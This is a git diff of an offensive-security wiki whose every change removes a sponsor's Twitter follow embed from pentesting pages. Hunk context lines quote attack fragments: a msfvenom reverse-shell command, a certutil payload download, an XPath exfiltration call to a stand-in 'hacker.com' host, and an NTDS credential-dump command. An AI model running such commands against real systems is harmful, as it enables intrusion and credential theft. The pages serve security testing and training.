diff --git a/README.md b/README.md index 4a925eb37..8922818c9 100644 --- a/README.md +++ b/README.md @@ -71,7 +71,7 @@ Get Access Today: 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ### [WebSec](https://websec.nl/) diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 00caca1cb..87e9643b1 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -22,7 +22,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Wifi basic commands @@ -312,7 +312,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## WPA/WPA2 PSK @@ -822,7 +822,7 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md index 6db996135..15776a116 100644 --- a/generic-methodologies-and-resources/shells/msfvenom.md +++ b/generic-methodologies-and-resources/shells/msfvenom.md @@ -27,7 +27,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + @@ -205,7 +205,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index 1df32938c..7385118d1 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -24,7 +24,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Lolbas @@ -338,7 +338,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## **Cscript/Wscript** @@ -594,7 +594,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index a4dd69b97..7635d0aee 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -22,7 +22,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) @@ -174,7 +174,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index c5eeeb9cb..2e910d04a 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -22,7 +22,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Linux Privesc @@ -467,7 +467,7 @@ launchctl print gui//com.company.launchagent.label 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Auto Start Extensibility Point (ASEP) @@ -1278,7 +1278,7 @@ sudo killall -HUP mDNSResponder 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index df231ac28..82ffba061 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Android Applications Basics @@ -73,7 +73,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Static Analysis @@ -267,7 +267,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Dynamic Analysis @@ -521,7 +521,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Automatic Analysis @@ -734,7 +734,7 @@ Useful to detect malware: [https://koodous.com/](https://koodous.com) 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Obfuscating/Deobfuscating code @@ -819,7 +819,7 @@ For more information visit: 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 7650cddb0..9bd50fde6 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Android Security Model @@ -144,7 +144,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + @@ -476,7 +476,7 @@ Generally the MDM solutions perform functions like enforcing password policies, 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 419121c29..09d7dea14 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Basic Information @@ -119,7 +119,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index 1b190c154..3e897a1df 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Basic Information @@ -136,7 +136,7 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index eb833f64b..ab48b9fa7 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -24,7 +24,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## WinRM @@ -177,7 +177,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## WinRM connection in linux @@ -346,7 +346,7 @@ Entry_2: 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 8e7a0abd6..604fa10b5 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -27,7 +27,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + @@ -175,7 +175,7 @@ Now as can be seen below we have complete system access: 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index dd36d1c0e..fa9c37c10 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Basic Information @@ -162,7 +162,7 @@ HGET 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Redis RCE @@ -345,7 +345,7 @@ _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index a837e11e1..de722421d 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + @@ -196,7 +196,7 @@ curl http://127.0.0.1:80 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 6dfa1634d..996fd817f 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Basic Information @@ -396,7 +396,7 @@ There are other methods to get command execution, such as adding [extended store 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## MSSQL Privilege Escalation @@ -544,7 +544,7 @@ You probably will be able to **escalate to Administrator** following one of thes 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index 0a886139a..fe34fdfa5 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Basic Information @@ -105,7 +105,7 @@ Entry_2: 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index 1819dfb00..7cb00a002 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## What is CSP @@ -473,7 +473,7 @@ Trick from [**here**](https://ctftime.org/writeup/29310). 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Unsafe Technologies to Bypass CSP @@ -604,7 +604,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**] 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index 734687027..581090829 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## What is CSRF? @@ -200,7 +200,7 @@ To set the domain name of the server in the URL that the Referrer is going to se 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## **Exploit Examples** @@ -607,7 +607,7 @@ with open(PASS_LIST, "r") as f: 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index a9da545bf..73c59219d 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## File Inclusion @@ -439,7 +439,7 @@ Be sure to URL-encode payloads before you send them. 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## LFI2RCE @@ -637,7 +637,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md index 92a540162..04b33c399 100644 --- a/pentesting-web/reset-password.md +++ b/pentesting-web/reset-password.md @@ -22,7 +22,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + @@ -336,7 +336,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md index a3b174d84..e07358b0d 100644 --- a/pentesting-web/xpath-injection.md +++ b/pentesting-web/xpath-injection.md @@ -23,7 +23,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## **Basic Syntax** @@ -94,7 +94,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Example @@ -337,7 +337,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS)) 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +
diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index 4cabefc5e..3c8cb434d 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -27,7 +27,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + @@ -96,7 +96,7 @@ Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbos 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md index f616ad4ce..f778fd64c 100644 --- a/windows-hardening/stealing-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -24,7 +24,7 @@ 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Credentials Mimikatz @@ -180,7 +180,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} + ## Stealing SAM & SYSTEM @@ -352,7 +352,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco 💬 Participate in community discussions -{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %} +